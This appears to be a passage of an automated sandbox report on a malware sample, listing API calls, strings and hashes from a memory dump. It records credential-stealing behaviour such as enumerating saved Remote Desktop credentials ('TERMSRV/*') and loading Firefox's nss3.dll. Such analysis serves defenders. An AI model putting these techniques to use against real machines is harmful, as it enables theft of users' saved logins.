                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: http://$https://
                                        • API String ID: 0-1916535328
                                        • Opcode ID: 39d7d017b2bfccf2b7ff02d95f8e3b57887f070f51d240ca058be188e98a1ddb
                                        • Instruction ID: 59d31cc17ce28022f2912d39386f2671d424408c231291671feefe15d01a8b62
                                        • Opcode Fuzzy Hash: 39d7d017b2bfccf2b7ff02d95f8e3b57887f070f51d240ca058be188e98a1ddb
                                        • Instruction Fuzzy Hash: 9241F431800109FADF12AF91DE45BDE7B72AF40308F10817AF951791E1DB798BA0EB59
                                        APIs
                                          • Part of subcall function 004015B3: lstrlenA.KERNEL32(00000000), ref: 004015BF
                                        • StrStrIA.SHLWAPI(?,004167DE), ref: 0040CA93
                                        • lstrlenA.KERNEL32(TERMSRV/,?,004167DE), ref: 0040CAA1
                                        • StrStrIA.SHLWAPI(?,TERMSRV/,TERMSRV/,?,004167DE), ref: 0040CAB1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen
                                        • String ID: TERMSRV/
                                        • API String ID: 1659193697-3001602198
                                        • Opcode ID: 7f94b50e48cdeab5a7c9e9d7e18237ce5f200bd076a7c76d6095bbe6d9e3bbaa
                                        • Instruction ID: c7fb664706467371fd79dda97cb73d98fe1a168560675967c2bc25be9365f3c6
                                        • Opcode Fuzzy Hash: 7f94b50e48cdeab5a7c9e9d7e18237ce5f200bd076a7c76d6095bbe6d9e3bbaa
                                        • Instruction Fuzzy Hash: C911963151010DFBCF026F65DD829DD3E22AF44358F104526BD25781F1DB7ADAB1AB98
                                        APIs
                                        • lstrlenA.KERNEL32(?), ref: 00401CB4
                                        • lstrlenA.KERNEL32(00000000,?), ref: 00401CBE
                                        • lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401CD2
                                        • lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401CDB
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$lstrcatlstrcpy
                                        • String ID:
                                        • API String ID: 2414487701-0
                                        • Opcode ID: 35e48de9ef45b66baf13970b20c5c5913bfad593f4f38aafa79406b17557bb0f
                                        • Instruction ID: 0d71ddcc776453f6807f4a2644943ab45e2aa76a7b4ada536b522d4d67ac145f
                                        • Opcode Fuzzy Hash: 35e48de9ef45b66baf13970b20c5c5913bfad593f4f38aafa79406b17557bb0f
                                        • Instruction Fuzzy Hash: EAF0F475500208BFEF017F61CC85ADA3A98AB5039CF00C12ABC1918262D7BDCAC49B88
                                        APIs
                                        • lstrlenA.KERNEL32(?), ref: 00401C60
                                        • lstrlenA.KERNEL32(00000000,?), ref: 00401C6A
                                        • lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401C7E
                                        • lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401C87
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$lstrcatlstrcpy
                                        • String ID:
                                        • API String ID: 2414487701-0
                                        • Opcode ID: a5145505d8b7b002e04c78e64ecefef1a810ed9ebe4f332c19b7d983fded2b1f
                                        • Instruction ID: ca5b4a345fe0166e5dd6a2ca728e5449c9932da92f02a55abf7aefca79bb44fa
                                        • Opcode Fuzzy Hash: a5145505d8b7b002e04c78e64ecefef1a810ed9ebe4f332c19b7d983fded2b1f
                                        • Instruction Fuzzy Hash: 31F01C7510030CBFEF003F61CC81A9E3A98EB1535CF00D12ABC2A59262D7BDC9D49B58
                                        APIs
                                        • lstrlenA.KERNEL32(?), ref: 00408EAE
                                        • SetCurrentDirectoryA.KERNEL32(?,?), ref: 00408ECF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CurrentDirectorylstrlen
                                        • String ID: nss3.dll
                                        • API String ID: 2713697268-2492180550
                                        • Opcode ID: def9fda2b1dd31527a69a2c4e7275fb1b3f76d08939b7249084c830a98d10a6b
                                        • Instruction ID: 607dede2c62840eaa67276cbe4800c76269459c512096fa5e078730568560c26
                                        • Opcode Fuzzy Hash: def9fda2b1dd31527a69a2c4e7275fb1b3f76d08939b7249084c830a98d10a6b
                                        • Instruction Fuzzy Hash: E0116530500106DFDB11AF70DD49BCB3FA1FB54349F10903BF449A52E1DBBA88959A4D
                                        APIs
                                        • CredEnumerateA.ADVAPI32(TERMSRV/*,00000000,00000000,00000000), ref: 0040CB44
                                        • CredFree.ADVAPI32(00000000), ref: 0040CB8B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Cred$EnumerateFree
                                        • String ID: TERMSRV/*
                                        • API String ID: 3403564193-275249402
                                        • Opcode ID: 33381bba7bd9533033619352b0ea26ba5ed8ec3c00acc8a710606ef1cb1c3413
                                        • Instruction ID: d31309ea4916ea7d4aeac043a37891cba6fae50ae8bf38473393457ebaf40a98
                                        • Opcode Fuzzy Hash: 33381bba7bd9533033619352b0ea26ba5ed8ec3c00acc8a710606ef1cb1c3413
                                        • Instruction Fuzzy Hash: 05115E31400209EBDF218F98E84ABDEB7B4FB04315F14427AD541711E1C379BA84EB89